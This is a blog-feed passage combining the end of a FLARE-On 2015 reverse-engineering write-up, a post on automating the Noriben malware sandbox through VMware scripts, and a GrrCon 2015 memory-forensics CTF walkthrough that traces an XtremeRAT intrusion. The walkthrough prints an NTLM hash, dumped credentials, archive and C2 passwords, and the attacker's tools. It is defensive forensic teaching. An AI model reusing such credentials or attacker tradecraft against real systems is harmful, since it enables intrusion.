foriinrange(0,255):# Honestly, I broke this up into 6 simultaneous scripts to run faster
cmd='breakme.exe %d'%i
print(cmd)
try:
stdout=subprocess.check_output(cmd,stderr=subprocess.STDOUT,timeout=seconds)
exceptsubprocess.TimeoutExpired:
pass


Now, first, this is not the proper way of doing that. Second, that patch doesn't make the program actually exit, it just crashes it with an unknown software exception (0xc0000417). So I'd have a ton of numbers do nothing and a small handful that crashed.

Of the three command line arguments that crashed for being less than 60 seconds (205, 238, 240) 205 was unique in reaching that point in literally less than a second. That seemed odd enough to investigate further.

Using 205 as an argument changed the entire outlook of the program. Now, early checks that would increase the Data_Checks global value were skipped. On the very first pass, at 0x4016D4, a routine to ROR and XOR data was tested to ensure that the first DWORD was all nulls. Without a proper command line argument, it would appear similar to this:



However, once given 205, it produced:



Every additional check would also produce expected results, skipping large amounts of number crunching. Additionally, the Data_Checks value was never incremented. This value counts the number of loops in which the data validation failed, suggesting that this value should always stay null.

The second part of this challenge was determining that after every large round of computation, shown in pseudocode earlier, the data is re-encoded. As this data is integral to the second part, it needs to be correct before sending it back.  From letting the program run with '205' on a second computer overnight (12 hours to run), I discovered that it would produce a garbage JPG by default. Therefore, we need to break out of this loop before it reaches 32 rounds. But, how many rounds do we let it run?

Others found the clean answer to this problem by examining comparisons on the back end. Me? I had a jug of sangria and time to kill on a Saturday afternoon. So, I manually brute forced it while catching up on my Black Butler episodes. It turns out that it didn't take that long.

At the end of each round of checks I set a break point and disabled all prior others. I would run to this CMP EAX, 20 then, at the following JB, just change the C flag to cause it to break.



Each round produced junk JPGs until I hit round 10, opened the JPG expecting another round of garbage, and screamed like a teenage girl at a Justin Bieber concert. There I saw some sort of SportsBall player with an email!


Cryptol0gists_h8_him@flare-on.com

Filename Etymology: CryptoGraph
Again. Let's think about this. spin_me_right_round. grab_some_popcorn. one_bit_hahaha_two_bits_hahaha. ...


After sending off the email I tried to figure out who this was and why he was there. TinEye reports him as Lionel Messi who is apparently a good SportsBall player. Or, is he?



There you have it. This was an amazingly fun challenge (except #6) and I learned much along the way. I am now prepared to go back and re-do the challenges using the methods detailed by others. My methods tend to be very brute-force-ish, very 'mess with things in memory until they work', CTF-speed hacks. But I am slowly forcing myself to learn the proper methods: WinDbg/GDB scripts, PIN tracing, more IDAPython, debugger memory fuzzing.


How often in life we complete a task that was beyond the capability of the person we were when we started it.
—  Robert Brault


The Prize

Last year FLARE presented each winner with a serialized challenge coin (RMO) for their completion order. I received coin 0x83 (#131). This year they changed it up a bit and introduced ... a FLARE belt buckle!

Jokes aside, it's an awesome design and is self-supporting.




Additional Write-Ups

FireEye's Official Solutions
Topher Timzen's A Successful Yet Failed Flare ON Challenge - The Write-up
AcidShout's 2015 FLARE-ON challenges writeup
Reno Robert's v0ids3curity writeup
Mohamed Shetta's FLARE On 2015 Walkthrough
z3r0zh0u's XLOYE Write Ups
Julien Perrot Flare On 2 write-up
A Disturbing Lack of Taste Challenges #7 and #8
0x0A Tang Solving for Hashes in Flare-On #5


Did you find benefit or enjoyment from this post? Was it a waste of your time? Please, leave feedback! I'm open to critiques, criticisms, and attaboys.  If you like it, I'll keep creating them. Though, next time, a more Forensics related one.

Creating a Malware Sandbox in Seconds with Noriben.

$
0
0
Happy New Years!

As part of the new year, let's make an effort to make your defensive posture better, especially through quicker and more effective malware analysis! A few years ago I created a sample malware analysis sandbox script to use for the analysis and reverse engineering that I performed on a daily basis. Let's show how you can perform analysis of malware within just a few seconds with almost no setup at all.

  1. Introduction
  2. Automating Sandboxing with VMware
  3. How you can help! Even with no technical background!
  4. Download Information

For those who are already familiar with Noriben, feel skip to the second section to see the new content.

Introduction


If you've followed me on Twitter, or kept up with this blog, you would be familiar with Noriben. If not, it's a very simple script. In typical behavior analysis one would run malware within a sandbox to see exactly what files it creates, what processes it runs, and what changes it makes to the system. The most common way that many defense teams use is to upload the file to a central anti-virus testing site like VirtusTotal and to online sandboxes like Malwr and those using Cuckoo.

For teams who are leery of uploading their files to the Internet, which is especially inadvisable for APT-related investigations. As advanced actors monitor online sites to see if their files are uploaded, they can determine if their free reign within the environment comes to an end and an IR response has started.

Running malware locally is most commonly performed through Cuckoo, an awesome and open-source sandbox application designed for malware that produces very comprehensive results. However, there is is arguably considerable effort required to set up Cuckoo correctly, with multiple sites offering walkthroughs for various environments. While relatively easy to install on Linux, installing on Windows or OSX can be frustrating for many. And, in my case, I'm often on the road with a random laptop and need to make a sandbox very quickly.

If you take a malware analysis training course, you've also likely been exposed to the SysInternals Procmon tool to monitor a system's environment. For those with more vintage knowledge, you learned Regmon and Filemon. Others use Regshot, a tool that is inadequate for many malware as it doesn't track finite changes within runtime.

Noriben is a simple wrapper for Procmon to collects hundreds of thousands of events then uses a custom set of whitelisted system events to reduce this down to a few dozen for quick review. For more, take a look at the slide deck I put together for the 2015 Black Hat Arsenal:




_____


______

This post won't really focus on the details tool itself. You can check out it's main page here: www.ghettoforensics.com/noriben

Automating Sandboxing from VMware


Typical usage of Noriben requires that you run it interactively within a sandbox while running your malware. After running Noriben, it collects overall system artifacts as you run malware. Many analysts use it to collect malware indicators for when they need to interact with the malware within the sandbox, such as with this video that does VM checking:


However, this blog post is to highlight an automated way to avoid this and to submit samples, and receive the resulting reports, directly from your host system.

By using VMware's vmrun command, the script will revert the VM to a known snapshot, copy the malware in, run Noriben, then zip and extract the report out. From the command line, one can receive a malware report within 60 seconds on a file. Below is an example of the bash script that runs from OSX:



#!/bin/bash
#Noriben Sandbox Automation Script
#Responsible for:
#* Copying malware into a known VM
#* Running malware sample
#* Copying off results
#
#Ensure you set the environment variables below to match your system
if[!-f$1];then
echo"Please provide executable filename as an argument."
echo"For example:"
echo"$0 ~/malware/ef8188aa1dfa2ab07af527bab6c8baf7"
exit
fi

DELAY=10
MALWAREFILE=$1
VMRUN="/Applications/VMware Fusion.app/Contents/Library/vmrun"
VMX="/Users/bbaskin/VMs/RSA Victim.vmwarevm/Windows XP Professional.vmx"
VM_SNAPSHOT="Baseline"
VM_USER=Administrator
VM_PASS=password
FILENAME=$(basename$MALWAREFILE)
NORIBEN_PATH="C:\\Documents and Settings\\$VM_USER\\Desktop\\Noriben.py"
ZIP_PATH=C:\\Tools\\zip.exe
LOG_PATH=C:\\Noriben_Logs


"$VMRUN"-TwsrevertToSnapshot"$VMX"$VM_SNAPSHOT
"$VMRUN"-Twsstart"$VMX"
"$VMRUN"-gu$VM_USER-gp$VM_PASScopyFileFromHostToGuest"$VMX""$MALWAREFILE"C:\\Malware\\malware.exe
"$VMRUN"-Tws-gu$VM_USER-gp$VM_PASSrunProgramInGuest"$VMX"C:\\Python27\\Python.exe"$NORIBEN_PATH"-d-t$DELAY--cmd"C:\\Malware\\Malware.exe"--output"$LOG_PATH"
if[$?-gt0];then
echo"[!] File did not execute in VM correctly."
exit
fi
"$VMRUN"-Tws-gu$VM_USER-gp$VM_PASSrunProgramInGuest"$VMX""$ZIP_PATH"-jC:\\NoribenReports.zip"$LOG_PATH\\*.*"
if[$?-eq12];then
echo"[!] ERROR: No files found in Noriben output folder to ZIP."
exit
fi
"$VMRUN"-gu$VM_USER-gp$VM_PASScopyFileFromGuestToHost"$VMX"C:\\NoribenReports.zip$PWD/NoribenReports_$FILENAME.zip

Obviously, this script needs minor editing on your part to establish the correct paths. By default it places the malware sample as "C:\Malware\malware.exe", runs Noriben off the desktop of the Administrator account, and outputs the results to "C:\Noriben_Logs\".

In action, here's a video of a malware file being scanned using this script:



Similarly, there's a script on Github for those running a Windows host:


:NoribenSandboxAutomationScript
:Responsiblefor:
:*CopyingmalwareintoaknownVM
:*Runningmalwaresample
:*Copyingoffresults
:
:Ensureyousettheenvironmentvariablesbelowtomatchyoursystem
@echooff
if"%1"==""gotoHELP
ifnotexist"%1"gotoHELP

setDELAY=10
setCWD=%CD%
setVMRUN="C:\Program Files (x86)\VMware\VMware Workstation\vmrun.exe"
setVMX="e:\VMs\WinXP_Malware\WinXP_Malware.vmx"
setVM_SNAPSHOT="Baseline"
SETVM_USER=Administrator
setVM_PASS=password
setFILENAME=%~nx1
setNORIBEN_PATH="C:\Documents and Settings\%VM_USER%\Desktop\Noriben.py"
setLOG_PATH="C:\Noriben_Logs"
setZIP_PATH="C:\Tools\zip.exe"



%VMRUN%-TwsrevertToSnapshot%VMX%%VM_SNAPSHOT%
%VMRUN%-Twsstart%VMX%
%VMRUN%-gu%VM_USER%-gp%VM_PASS%copyFileFromHostToGuest%VMX%"%1"C:\Malware\malware.exe
echo%VMRUN%-Tws-gu%VM_USER%-gp%VM_PASS%runProgramInGuest%VMX%C:\Python27\Python.exe%NORIBEN_PATH%-d-t%DELAY%--cmd"C:\Malware\Malware.exe"--output%LOG_PATH%
%VMRUN%-Tws-gu%VM_USER%-gp%VM_PASS%runProgramInGuest%VMX%C:\Python27\Python.exe%NORIBEN_PATH%-d-t%DELAY%--cmd"C:\Malware\Malware.exe"--output%LOG_PATH%
if%ERRORLEVEL%==1gotoERROR1
%VMRUN%-Tws-gu%VM_USER%-gp%VM_PASS%runProgramInGuest%VMX%%ZIP_PATH%-jC:\NoribenReports.zip%LOG_PATH%\*.*
%VMRUN%-gu%VM_USER%-gp%VM_PASS%copyFileFromGuestToHost%VMX%C:\NoribenReports.zip%CWD%\NoribenReports_%FILENAME%.zip
gotoEND

:ERROR1
echo[!]FiledidnotexecuteinVMcorrectly.
gotoEND

:HELP
echoPleaseprovideexecutablefilenameasanargument.
echoForexample:
echo%~nx0C:\Malware\ef8188aa1dfa2ab07af527bab6c8baf7
gotoEND

:END


A similar script can be written for VirtualBox. However, I ran into numerous issues getting the "guestcontrol copyto" to copy files in and out. If you'd like to take a stab at this, based on the code above, feel free!

How you can help!


As the developer of open-source software, the biggest hurdle is in handling every edge case. I am the sole developer (currently) of Noriben, therefore it is geared and written to my experiences. I love getting bug reports because (a) I know people are using it and (b) each person's system has its own unique qualities.

If you want to provide the most help for me there are two ways that I would greatly appreciate!

  1. Help me with the development through leveraging your programming expertise to improve it.
  2. Help to develop new white list filters.

The first is limited to a small set of people, but anyone can help with the second! The white list filters I use are based primarily off of my own VMs. But, as I've seen with others' reports, there are numerous other items that could be whitelisted. I had one analyst send me a report that had hundreds of items, whereas my own system typically produces less than two dozen. He simply had a lot of backend applications that I was not expecting (such as ngen.exe). Someone else had print drivers continuously being updated. 

To help, right now, download the files here into your VM and simply run it. Let it run for a minute or two without malware. Simply run Calc or Notepad. Then stop collection and send me the results. As there is no malware running, the results shown should likely be whitelisted for everyone. Take this and email your files to me (feel free to scrub any proprietary information) at brian @@ thebaskins.com.

Download Information


Noriben is hosted publicly on Github at: https://github.com/Rurik/Noriben.
At a minimum, you can download Noriben.py and be up and running. It is preferable that you also download ProcmonConfiguration.pmc and store it alongside Noriben.py. This configuration file contains numerous pre-analysis whitelists that could reduce your process logs from hundreds of megabytes to less than 10MB.


Thanks for reading and hopefully this will help you improve your defenses and incident response reaction times for the new year!

GrrCon 2015 - Memory Forensics - Grabbing all the Flags...

$
0
0
Today we bring you a special guest posting by Tony "@captcook32" Cook. Late last year GrrCon hosted their anticipatory excellent set of challenges which included an in depth memory forensics challenge by Wyatt Roersma. Tony and myself took a few days on a down week to try our hand at the challenge. I lacked the answers to two questions while Tony knocked them all out quickly.

While the scoreboard was reset to before our scores were posted, I'd like to present Tony's write-up on the challenge. The challenge files are still available for download, so feel free to try the challenge on your own and return for hints. Next to each question is the file required to answer it and the password needed to open the archive.

And so follows Tony Cook:





In October 2015 Google put on the GrrCon 2015 CTF challenge which was open to all who wanted to attempt the challenge. My colleague "The Brian Baskin" @bbaskin let me know it was going on & I wanted to test out my memory forensics skills so I gave it a shot. This was one of the most fun & valuable CTFs that I've ever done. I want to give a huge shout out the the Volatility team for their awesome product & for the GrrCon 2015 CTF team for having a semi real world challenge that made you think outside of the box. The following blog post is my walkthrough of how I got through the challenge. There are most likely far better ways to go about doing most of these & I don't claim to be a memory forensic expert but I hope this helps out anyone who got stuck on any of the questions &/or anyone looking for an explanation. 

Question #1


We start out with a question letting us know that user opened a "strange" email that appeared to be a security update, kudos to the CTF creators because who hasn't seen that happen... All we need to provide is the sender's email address. As with all of these questions there are about a million different approaches that we could take to find the answer, however, the way my lazy mind works I wanted to start by finding all the email addresses within the memory dump, then use that list to grep through the memory dump for these email addresses to hope for an email that would resemble the user's . So to start with I utilized Garfunkel amazing tool, the Bulk Extractor. Among several other options this tool can provide you with a histogram of email addresses which will provide us a starting point to start looking through the memory dump.





# BULK_EXTRACTOR-Version: 1.5.2 ($Rev: 10844 $)
# Feature-Recorder: email
# Filename: C:\Users\Admin\Desktop\target1\copy.raw
# Histogram-File-Version: 1.1
n=448 4b05e584-8dc6-4554-84cf-53ec8e59b175@allsafecybersec.com (utf16=164)
n=382 frontdesk@allsafecybersec.com (utf16=356)
n=171 cps-requests@verisign.com (utf16=1)
n=42 th3wh1t3r0s3@gmail.com (utf16=37)
n=24 test@allsafecybersec.com (utf16=20)
n=12 hernan@ampliasecurity.com (utf16=4)
n=9 support@teamviewer.com (utf16=9)
n=8 uxcyieztisogfmcq@mail.gmail.com (utf16=8)
n=6 front-desk@www.ms (utf16=6)
n=6 rontdesk@allsafecybersec.com (utf16=6)
n=6 someone@microsoft.com
n=5 front-desk@www.bi (utf16=5)
n=4 b05e584-8dc6-4554-84cf-53ec8e59b175@allsafecybersec.com (utf16=4)
n=4 certificate@trustcenter.de
n=4 efrontdesk@allsafecybersec.com (utf16=4)
n=4 front-desk@c.ms (utf16=4)
n=4 frontdesk@c.ms (utf16=4)
n=4 gtk-devel-list@gnome.org
n=3 frontdesk@www.ms (utf16=3)
n=3 ftp@example.com
n=3 smtpth3wh1t3r0s3@gmail.com (utf16=3)
n=3 user@domain.microsoft.com (utf16=3)
n=2 4cf-53ec8e59b175@allsafecybersec.com
n=2 anonymous@discussions.microsoft.com (utf16=1)
n=2 cps@netlock.net
n=2 e584-8dc6-4554-84cf-53ec8e59b175@allsafecybersec.com (utf16=1)
n=2 ellen@contoso.com (utf16=2)
n=2 ellenorzes@netlock.net
n=2 front-desk@c.bi (utf16=2)
n=2 frontdesk@c.bi (utf16=2)
n=2 frontdesk@www.bi (utf16=2)
n=2 g.j@g.jtg.jp
n=2 gtkmm-list@gnome.org
n=2 jane@dstc.edu.au
n=2 lagoze@cs.cornell.edu
n=2 me@xyz.com (utf16=2)
n=2 p.johnston@ukoln.ac.uk
n=2 rb05e584-8dc6-4554-84cf-53ec8e59b175@allsafecybersec.com (utf16=2)
n=2 t-cole3@uiuc.edu
n=2 tdesk@allsafecybersec.com (utf16=2)
n=2 test@allsafecybersec.com.ost.tm (utf16=2)
n=2 thabing@uiuc.edu
n=1 1dbb1f52d09c41deb0219406e46b6d81@ex01.al (utf16=1)
n=1 4-8dc6-4554-84cf-53ec8e59b175@allsafecybersec.com (utf16=1)
n=1 53ec8e59b175@allsafecybersec.com (utf16=1)
n=1 584-8dc6-4554-84cf-53ec8e59b175@allsafecybersec.com
n=1 59b175@allsafecybersec.com (utf16=1)
n=1 6-4554-84cf-53ec8e59b175@allsafecybersec.com
n=1 6e6@machine.in (utf16=1)
n=1 75@allsafecybersec.com (utf16=1)
n=1 84-8dc6-4554-84cf-53ec8e59b175@allsafecybersec.com
n=1 8e59b175@allsafecybersec.com (utf16=1)
n=1 8rontdesk@allsafecybersec.com (utf16=1)
n=1 allsafecybersec.localcf-53ec8e59b175@allsafecybersec.com (utf16=1)
n=1 b175@allsafecybersec.com (utf16=1)
n=1 c14e99c7-44bb-44ef-9f1d-5342c0afce0c@live.com (utf16=1)
n=1 com@machine.in (utf16=1)
n=1 controsts@verisign.com
n=1 d_1@machine.in (utf16=1)
n=1 defaultuser@defaultdomain.de (utf16=1)
n=1 dev@acpi.in (utf16=1)
n=1 e59b175@allsafecybersec.com (utf16=1)
n=1 ec8e59b175@allsafecybersec.com
n=1 effrontdesk@allsafecybersec.com (utf16=1)
n=1 en@cpu.in (utf16=1)
n=1 esmtpth3wh1t3r0s3@gmail.com (utf16=1)
n=1 f5515863b958724ebfb72c5011bfddcc@allsafecybersec.com (utf16=1)
n=1 frontdesk@allsafecybersec.co
n=1 g2v@machine.in (utf16=1)
n=1 h1t3r0s3@gmail.com (utf16=1)
n=1 i8e59b175@allsafecybersec.com
n=1 ieuser@microsoft.com (utf16=1)
n=1 inf@machine.in (utf16=1)
n=1 info@incomedia.it (utf16=1)
n=1 ins@oem1.in (utf16=1)
n=1 ion@machine.in (utf16=1)
n=1 ip6@cpu.in (utf16=1)
n=1 ipm.microsoft.contactlink.timestampfrontdesk@allsafecybersec.com (utf16=1)
n=1 jeffsmith@redmond.co (utf16=1)
n=1 le@machine.in (utf16=1)
n=1 le@oem1.in (utf16=1)
n=1 led@machine.in (utf16=1)
n=1 nodtse@klaslfacebyrees.co (utf16=1)
n=1 ntdesk@allsafecybersec.com (utf16=1)
n=1 ontdesk@allsafecybersec.com
n=1 outlook2.ostfrontdesk@allsafecybersec.com (utf16=1)
n=1 pfrontdesk@allsafecybersec.com (utf16=1)
n=1 rai@machine.in (utf16=1)
n=1 rnan@ampliasecurity.com
n=1 rya@machine.in (utf16=1)
n=1 sk@allsafecybersec.com (utf16=1)
n=1 snmpinfo@microsoft.com
n=1 someone@example.com (utf16=1)
n=1 ssr@umbus.in (utf16=1)
n=1 t3r0s3@gmail.com (utf16=1)
n=1 ta@rdpbus.in (utf16=1)
n=1 tuhtmhhttht@ht.ht
n=1 vista@gn.microsoft.com
n=1 vshubin@ntdev.microsoft.com
n=1 whit3r0s3th3wh1t3r0s3@gmail.com (utf16=1)
n=1 wm@machine.in (utf16=1)
n=1 wotdiityitmit@it.it
n=1 x-user-identityfrontdesk@allsafecybersec.com
n=1 y4cf-53ec8e59b175@allsafecybersec.com (utf16=1)

As I quickly looked over the top 5 highest counts a couple of the email addresses looked suspicious. However "th3wh1t3r0s3@gmail.com" stood out the most to me. Regardless how suspicious they might look to me now I had email addresses I could start to search for. 

Now we have a start but nothing to search through so I had to create a Volatility strings file. The instructions to complete this step are in this link. Once I created this file I simply started searching for the email addresses I had found in the Bulk Extractor output while looking for an email that resembled what the user had been sent. Lo and behold, remnants of an email from the suspicious email address concerning an update to the user's VPN software.


Notice that there is a PID associated with the strings thanks to the Volatility strings command, so just to ensure what process these strings are under I ran a psxview on the memory file to get that information.


 Now that I confirmed that these strings came from the Outlook.exe process. I rolled the dice and put in the suspect email address as the answer.

Answer: th3wh1t3r0s3@gmail.com

[Ed. Note: I took a different approach here. I knew it was an email, so my first step was a simple Volatility `yarascan -Y "From: "` which immediately produced the email address from the OUTLOOK.EXE process]

Question #2 


The next question was kind of tricky, only due to the wording of the question.  Essentially the question only asked what was the file that was delivered in the previous email. Since I had already done the work to find the email this was as simple as referring back to the link in the email.

Answer: AnyConnectInstaller.exe

Question #3



The CTF creators knew they took it a bit easy on the last question so they get a bit tricker in this one. Now that I had the filename I needed to figure out where and what it is. One of the Volatility plugins that I thought of to help me find the location of the file was FileScan. This nifty little tool scans the memory dump for FILE_OBJECTs with the output rendering the physical offset of the FILE_OBJECT, file name, number of pointers to the object, number of handles to the object, and the effective permissions granted to the object. At this point I could have added some regex searching to my command to search for only the filename I was looking for but I wasn't sure if there would be any other files I'd have to come across later in the challenge so I ran FileScan to search for all FILE_OBJECTS it could find in the memory dump. 


Now that I had that output I could search it to see if the "AnyConnectInstaller.exe" had any FILE_OBJECTS open. It turned out that there were a few entries for AnyConnectInstaller.exe which were the file itself & two Prefetch Files, which led me to believe the file had been executed on the host. 


Now that I knew the location of file I could use another Volatility plugin that could carve the files out using the Physical Offset location called DumpFiles


Voila, I now had the suspicious file in my possession, now what? Next I did some quick static analysis of the file only to be dismayed that it was a Borland executable, this wouldn't be as simple as I thought it could be. Strings of the executable showed that there might be a correlation to the XTREME, however upon trying the "XTREME" I was denied... 

The next thing I did was run in a sandbox tool made by Brian Baskin, Noriben, to get a feel for what the executable does. 


Through the process information I saw that the upon execution the file attempts to inject itself into iexplore.exe as well as the creation of a "Temp\XtremeServerSource.dat". At this point I was getting a bit frustrated with the analysis as I was no closer to getting the answer to the question. I decided to fire up Process Hacker and look at the memory of the injected iexplore.exe to see if I could glean anything from that before having to open up some debugging tools. I searched for the injected file name to begin with to see if I'd have any luck...



As soon as I searched for the file I found several interesting strings that led me down the right path and what I had been missing. The question stated that the answer would be one word and no spaces. While I had tried Xtreme... I had not tried XtremeRAT. I rolled the dice & jackpot...

Answer: XTREMERAT

Question #4


In this question the CTF creator wanted to know what process that the suspicious file was attempting to inject into. In the quest to find out what the "malware name" of the suspicious file we determined that if the file executed it would attempt to inject into iexplore.exe, so the next step would be to determine what process ID iexplore.exe had. A quick run of Volatility's PSXVIEW would quickly give me that answer. 



The process iexplore.exe has the PID of 2996... Put it in and... BOOM!!!


Question #5


In the question they wanted to know the value of persistence that the malware was using. Due to my   analysis of the suspicious file from earlier with Noriben I knew that the file was creating Registry entries in the \CurrentVersion\Run so it was just a matter of determining the value that stored the file path.


Mr Robot. Just as the question eluded to, you'll know it when you see it, I felt comfortable this was the answer.

Answer: MrRobot


Question #6


This question required me to do a bit of malware analysis as I couldn't quite understand what was happening with the malware just by the memory image. I didn't have a whole lot of knowledge about how XtremeRat worked so after a bit of OSINT I came across a few blog posts that helped me understand how it worked.

https://malware.lu/articles/2012/07/22/xtreme-rat-analysis.html
https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html

After reading through this I understood that the malware injects the Config file into memory then RC4 decodes it's data. I also knew that this config file should be allocated all at once meaning that all of the information "should" be together in a memory section. I also knew that it should contain the Name of the executable, the Directory File Location, & FTP information. So now I had a starting point to look through the memory point.

Since I had the malware already in hand I moved it over to a VM with some Process Monitoring tools to see how it worked. I used the information I ascertained about the malware injecting into an Internet Explorer process to filter down using Process Hacker. Then I ran strings on the memory of the process & filtered for "FTP".



I only noticed one legitimate FTP site in the list so I clicked on that to drill into it's memory section. When I reviewed it saw everything I learned about the Config file from the blog posts including the Mutex, FTP information, & Directory Location. I then saved out that portion of the memory section & ran strings on it. After removing the obvious garbage I was left with the following output.


I was looking for a C2 password in this entire list of strings. I removed out the Xtreme RAT references, the Mutex, the Registry Input, the addresses, the Directory Locations, & errors to down to 7 possibilities. After reviewing the question I had 10 possible tries so I went through them all. I was starting to get a bit nervous as I reached the end of the list however upon trying "GrrCon2015" I was given the green light & I wiped the sweat from my forehead. Now is there a way better & more accurate way to do this? Absolutely. You could follow the Malware.lu's blog post & completely reverse the executable to find the correct answer. After the contest I went back to do which I recommend everyone try out to see the little nuance in this Xtreme Rat executable but that's for another blog post & another time.

Answer: GrrCon2015

Question #7


This question was essentially just asking for the mutex of the file. Utilizing the handles plugin I was able to filter down to only mutant objects as well as only objects associated with the process where the malware was running 2996. Leaving me only a couple of options to try and find the right answer.



Answer: fsociety0.dat

Question #8


This question was a little tough for me at first because I was looking for all the clues in all the wrong places. What I ended up doing was trying to look for accounts that had previously been on the box even though their account might have been deleted. This led me to dumping the MFT and looking for old profiles. In looking for this I found ol "zero cool" from Hackers.





Answer: Hackers

[Ed. Note: I did a very ghetto cmdline here :)
grep -i "Users" target1_mftparser.txt | gawk "{print $NF}" | grep -o "^Users.........." | sort | uniq]


Question #9


This question was fairly straightforward and simple, get the Administrator's NTLM hash. This can be completed by running the hashdump plugin on the memory dump, which gave me the answer.



Answer: aad3b435b51404eeaad3b435b51404ee:79402b7671c317877b8b954b3311fa82

Question #10


Here's where the analysis starts to get interesting. Wow we are being asked to find some tools being used after the initial compromise. How do we start here? My first thought was run the MFT plugin from Volatility and see what had been put onto the system after the original suspicious file.


Upon opening up the MFT output I immediately searched for the creation time of the AnyConnectInstaller.exe to determine the date and where the rest of my search should continue. Luckily I didn't have to go too far below those entries to find 3 files that I've seen on several IR engagements. "Rar.exe, nbtscan.exe, wce.exe" were all created mere minutes behind the suspicious file. I threw those in alphabetical order and I was off to the races.

ANSWER: nbtscan.exe,rar.exe,wce.exe


Question #11


This question was also pretty straightforward, I had already seen WCE.exe be put on the box so there should be an associated dumped credential file so the attacker could move the credentials around. In previous memory forensic work I had seen wce work & I knew that I had seen the entire executed command before through the basic strings output for the memory dump. I attempted the same philosophy here & lightening stuck twice.


I now knew the output file of the WCE command was "w.tmp" I could either use my MFT output or my FileScan output to determine the location of the file & carve it out to see what treasures it held.


I opted to use FileScan's Physical location so I could then use the dumpfiles plugin on the address space.


Then it was just a matter of opening the file and seeing what was inside.


There lay the answer to the question.

Answer: flagadmin@1234

Question # 12


This question was asking for the $STD Creation time for the NBTSCAN.EXE tool. Since we already ran the MFTParser tool we have access to the answer already. 


Look under the $STD information & we see the answer. 


Answer: 2015-10-09 10:45:12


Question #13


This question ended up being easier than most of the other questions because the file name that needs carved out was already given. I followed the same methodology as all of the previous carves. 
                Filename ->; FileScan Output ->; Physical Offset ->; DumpFile





Question #14


So finally the competition switches to the network side of things. To first get a glimpse at the network connections I ran the netscan plugin. After seeing the results I knew the PID of the injected process  (iexplore.exe) that the malware was using (2996) so I re-ran the command, this time grepping for just the PID I needed. 



The result was a single connection to "". I took my chances and input it as the answer, BINGO.

Answer: 180.76.254.120:22


Question #15


This question appeared to quite simple after running the last netscan as in the results of that output we saw a few connections out to TeamViewer servers, but how could I be sure that it was installed after the attackers got in? I quickly referenced the MFT Parser Timeline csv I created earlier to see what was put on the system AFTER the attackers got in. Sure enough a TeamViewer installer was found in directly after a few Prefetch files for the "Attacker" tools earlier as well as an AT command. 



Answer: Teamviewer

Question #16


This question was another fairly simple question as long as you understood the Windows OS basics. A builtin remote access too huh? I went straight to the netscan output to look for remote desktop connections either using mstsc.exe or over the default port 3389.


Answer: 10.1.1.21

Question #17


Looks like I had finished up with the Target 1 host & moved on to Target 2 for this next question. "Laterally" btw... ;-) Anywho we needed to figure out what Gideon's actual password was. Since we had already seen the attackers use WCE on the target 1 host I assumed that like most attackers that would be the tool they'd use across the board so I took the same approach. I looked for WCE in the strings to see if I could find the entire command. 


Now that I had that I could run FileScan to see if the file had a FILE_OBJECT. Sure enough it did and then I could run dumpfiles against it to drop out the file and then open it to find out the answer


Answer: t76fRJhS

[Ed. Note: I failed to get this one :) But in retrospect I now see it in my notes for #18]

Question #18


This next question was a little tricky as well only because of the wording of the question. At first glance I assumed that the question was what Windows credentials were being used to pivot to the domain controller, however that must have been the previous questions answer so I moved on. My next thought went to what I would do if I got creds and wanted to move forward, well I'd probably already have a shell open. Fortunately Volatility has just the plugin to show us that input with cmdscan.


Looking at the output I saw the wce.exe being executed so I felt pretty confident this was the conhost.exe I was looking for. Looking further into the output I saw bad guy run "whoami" to figure out what user he was using at the time then the Z: get mapped with the current credentials (gideon). Once mapped I saw him/her then copying over rar.exe, most likely to archive whatever files the attacker is attempting to exfil. Then we see what's really interesting... the attacker use the RAR command to archive all text files in their current directory with the password 123qwe!@#. Notice that  I didn't include the -hp which is actually just part of the parameters to include a password for RAR files. Once I input this as the answer and I was on my way to success.

Answer:  123qwe!@#


Question #19


As I started this question I already had the answer from the previous output which was the password protected "crownjewlez.rar".

Answer: CrownJewlez.rar 

Question #20


This next question we have is what are the files that were archived inside the RAR file. In order to answer this one I had to think about what actually happened. A conhost.exe was the root of what showed me that the RAR file was created so maybe if I looked more into that process I would find what files were added into them. The easiest way to do this was to look at the strings for this process for clues to see where I could go next. I ran the Volatility strings process that was explained earlier then grep'ed for just the process in question 3048. The result was pretty interesting in that I could see the exact file names that we added to the RAR file. 


In the clear text strings I could see 3 files being added to the RAR file after the command was run, similar to what would have been in the output of the command on a terminal. I inputed these filenames in the order they got added and the right format then... boom, winning...

Answer: SecretSauce1.txt,SecretSauce2.txt,SecretSauce3.txt

[Ed. Note: I failed to get this one :)]

Question #21


This question ended up being a basic IR question. A scheduled job was created on the machine to which we have to find the file name that is associated with it, most likely the file that is being run through the task. I knew that scheduled tasks are created in the \Windows\Tasks\ directory & I had already created an output file from the FileScan plugin so it was just a matter of grepping that file for all the files which we located in that directory.


There were three files found in that directory. The first being the default SCHEDLGU.TXT file, then a GoogleUpdateTask, and finally an At1.job file. By default if no other name is given to a scheduled job utilizing at.exe it will name itself At1.job but this only gets us the file so I carved the file out utilizing the process I had been using previously to see what was in this Job file. The job file is actually not human readable and needed to be parsed utilizing Jamie Levy's jobparse.py. Once the file was parsed it was easy to see that 1.bat was being called during the scheduled time.



Answer: 1.bat 

[Ed. Note: I didn't carve files out but instead expected to find the full contents within the MFT. I displayed each out and eyeballed it:
> grep -i "\.job" target2_mftparser.txt -A50 | grep "\$DATA" -A10
$DATA
0000000000: 01 06 01 00 01 e0 b4 20 f7 a5 f4 43 8d f5 25 57   ...........C..%W
0000000010: 7f 5f a1 48 46 00 d2 00 00 00 00 00 3c 00 0a 00   ._.HF.......<...
0000000020: 20 00 00 00 00 14 73 0f 01 00 00 00 00 13 04 00   ......s.........
0000000030: 02 00 e0 21 df 07 0a 00 05 00 09 00 08 00 00 00   ...!............
0000000040: 00 00 8f 00 00 00 16 00 63 00 3a 00 5c 00 75 00   ........c.:.\.u.
0000000050: 73 00 65 00 72 00 73 00 5c 00 67 00 69 00 64 00   s.e.r.s.\.g.i.d.
0000000060: 65 00 6f 00 6e 00 5c 00 31 00 2e 00 62 00 61 00   e.o.n.\.1...b.a.
0000000070: 74 00 00 00 00 00 00 00 07 00 53 00 59 00 53 00   t.........S.Y.S.
0000000080: 54 00 45 00 4d 00 00 00 1e 00 43 00 72 00 65 00   T.E.M.....C.r.e.
0000000090: 61 00 74 00 65 00 64 00 20 00 62 00 79 00 20 00   a.t.e.d...b.y...]

Question #22


